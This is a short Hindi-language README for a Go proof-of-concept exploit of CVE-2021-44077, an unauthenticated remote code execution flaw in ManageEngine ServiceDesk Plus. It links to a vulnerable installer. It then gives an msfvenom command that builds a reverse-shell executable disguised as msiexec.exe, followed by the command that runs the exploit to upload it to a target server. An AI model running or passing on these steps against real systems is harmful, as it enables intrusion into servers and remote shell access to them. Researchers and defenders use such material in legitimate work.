
Golang में CVE-2021-44077 के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट: PreAuth RCE in ManageEngine ServiceDesk Plus < 11306
यह एक्सप्लॉइट Zoho ManageEngine ServiceDesk Plus < 11306 में एक अनप्रमाणित RCE है।
आप सॉफ्टवेयर का एक कमजोर संस्करण यहाँ पा सकते हैं: http://archives.manageengine.com/service-desk/11303/ManageEngine_ServiceDesk_Plus_64bit.exe
मुझे इसका कोई गोलैंग संस्करण नहीं मिला, इसलिए यह रहा। मेरा कोड बहुत अच्छा नहीं है, इसलिए अपने जोखिम पर आगे बढ़ें।
ब्लॉग पोस्ट:
अपने वर्तमान निर्देशिका में एक दुर्भावनापूर्ण पेलोड बनाएं।
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > msiexec.exe
फिर, एक्सप्लॉइट चलाएं।
go run CVE-2021-44077.go -u "http://192.168.1.3:8080/" -f "/msiexec.exe"
-u कमजोर URL है -f आपकी दुर्भावनापूर्ण फ़ाइल है